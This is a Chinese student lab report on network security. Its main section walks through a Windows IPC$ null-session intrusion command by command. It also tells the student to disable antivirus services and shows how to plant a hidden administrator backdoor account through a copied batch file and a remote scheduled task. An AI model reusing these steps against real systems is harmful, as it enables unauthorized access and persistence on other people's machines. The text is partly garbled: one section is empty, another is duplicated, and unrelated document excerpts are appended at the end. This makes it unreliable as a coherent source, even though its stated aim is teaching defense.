某某学院。
实习报告。实践环节名称: 网络安全与病毒防范。
学院: 某某学院
专业、班级:
指导教师:
学生姓名:
学号:2023年5月 20日。
一、 实习目的。
1 剖析常见网络协议、操作系统与应用程序漏洞,分析黑客入侵的思路和方法,实践防止黑客网络攻击的基本手段。
2 了解防火墙的基本原理和防火墙的主要技术,掌握防火墙的配置和使用方法。
3 掌握常见的网络安全技术,学习数据加密的原理。
4 提高学生的网络安全意识和病毒防范水平。
二、 实习时间。
三、 实习地点。
网络实验室。
四、 实习内容:
1关于ipc$漏洞。
ipc$是共享“命名管道”的资源,他是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
ipc$是windows nt/2000的一种新功能,可在同一时间内,两个ip之间只允许建立一个连接。windows nt/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享和系统目录winnt和windows(admin$)共享。
ipc$漏洞。其实ipc$本身并不是一个真正意义上的漏洞,其主要漏洞在于其允许空会话,空会话是在没有信任的情况下与服务器建立的会话。
对于windows nt系列的操作系统。在默认安全设置下,借助空连接可以列举目录主机上的用户和共享,访问everyone 2000作用更小,因为在windows 2000和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需要借助工具。从以上描述来看空会话好像没有多大用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,一些具体命令如下。
首先建立一个空会话,命令:net use \\ipc$“”user“”
空会话建立之后,可以进行查看远程主机的共享资源。命令:netview \\ip
查看远程主机的当前时间。命令:net time \\ip
得到远程主机的netbios用户名列表。命令:nbtstat-a ip
通过以上对ipc$de 学习成功建立ipc$入侵windowsxp ,测试环境:主机(windowsxp sp3)与wndows xp sp2虚拟机) 通过ipc$与windowsxp建立连接,在现在的绝大多数的xp操作系统中总是会出现问题。以下如何解决在建立ipc$出现的一系列问题。
ipc$(internet process connection),通常很多的机子的默认共享都是打开的!在cmd下使用net share命令是不是发现有很多$,“ipc$ admin$ ,c$ ,d$..现在进入正题:
use \\目标ip\ipc$
在实验过程**现了出现“53错误”,后请教老师后,原来目标主机打开了系统防火墙或者其他防火墙软件。
解决方法:计算机上的杀毒软件退出,服务禁止,防止杀毒软件将部分工具作为恶意**进行删除。服务禁止办法,在控制面板->管理工具->服务,打开服务,看到杀毒软件相关服务项,点属性,选择常规,将正在启用的服务先停止,后选择启动类型,选择禁用。
出现1326错误:
1)net use \\目标ip\ipc$ "user:"administrator"进行连接,报告系统发生1326错误,登陆失败:未知用户名或密码错误。
检查一下我们的命令是否错误或者用户名错误。结果发现无错。
2)在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接,是无法访问ipc$等管理共享的。结果发现时这个错误,纠正。
紧接着可能出现1327错误:登陆失败:用户帐户限制。
可能的原因包括不允许空密码,登陆时间限制,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".
映射对方默认共享c盘:net use z: \目标ip\c$
实习总结建立ipc$告一段落,删除ipc$连接:net sue \\目标ip\ipc$ /del在次基础上在目标电脑上留下后门账号:编写一个批处理文件,并拷贝到对方的电脑上,然后增加计划任务执行批处理文件;
批处理命令:(保存为 user nebulastest 123456 /add//增加用户nebulastest,密码123456 net localgroup administrators nebulastest /add //为用户nebulastest赋予管理员权限,然后在本机上执行命令(已经建立ipc$连接):copy \\目标ip\c$,接着查看目标电脑时间:
net time \\目标ip,随后为目标电脑增加计划任务:at \\目标ip 执行时间 c:\
在完成以上工作后删除当前ipc$链接,使用新用户和新密码建立ipc$链接,以测试时候建立账号成功。net use \\目标ip\ipc$ "123456" /user:"nebulastest"
2防火墙的配置。
防火墙是一种高级访问控制设备,是在被保护网和外网之间执行访问控制策略的一种或一系列不见得组合,是不同网络安全域间通信流的通道,能根据企业有关安全策略控制进出网络的访问行为。在实习中我们做了以下实验。
3 windows中的加密技术应用 (office组件中的数字签名、加密)
开始-> 程序-> microsoft office ->microsft office 工具 ->vba项目的数字证书命令,打开创建数字证书对话框-> 输入证书名称并确定。
3 windows中的加密技术应用 (office组件中的数字签名、加密)
开始-> 程序-> microsoft office ->microsft office 工具 ->vba项目的数字证书命令,打开创建数字证书对话框-> 输入证书名称并确定。
五实习总结。
为期一周的实训,我意识到了网络安全的重要性和掌握防范水平的必要性。
单单熟悉基本网络安全理论知识是不够的,还要从实际出发。只有在实践中才能了解其可行性。
在实训过程中,可以说是困难重重。刚开始时,做的准备工作就花了六个课时,建局域网,装虚拟机。。。哪怕是一个小小的细节疏忽,都会使实验功亏一篑。
当然,在老师的帮助下和同学的合作下,我们终于跨过了一个个障碍。发现问题,解决问题,在解决问题中发现问题。。。
网络安全与网络安全文化及网络安全防范
一 前言。随着计算机网络在人类生活领域中的广泛应用,网络的攻击事件也随之增加。网络环境的出现极大地方便了人们之间的信息交流,推动了人类社会的进步。但同时,它也是一把双刃剑,它在为我们提供了便利的同时,也带来其中网络安全问题。其中网络安全问题已成为日渐棘手 迫切需要解决的一项任务。以前,人们注重从技术...
网络安全与网络安全文化
作者 胡光睿。电脑知识与技术 2008年第36期。摘要 该文论述了文化对人的网络信息行为的影响,介绍了网络安全文化的产生背景和构成。并对网络安全文化的内涵及作用机制进行了研究。关键词 网络文化 网络安全 网络安全文化。中图分类号 tp3 文献标识码 a 文章编号 1009 3044 2008 36 ...
网络安全知识手册 网络安全知识板报
网络安全实验报告模板。武汉大学计算机学院。网络安全实验。专业 班信息安全专业。学号 姓名 任课教师陈晶。2016年 1月 5 日。目录。一 入侵检测与入侵防御3 嗅探实验3 数据包记录器实验7 入侵行为检测实验11 实验报告16 实验心得17 二 漏洞18 主机存活性判断错误!未定义书签。服务 端口...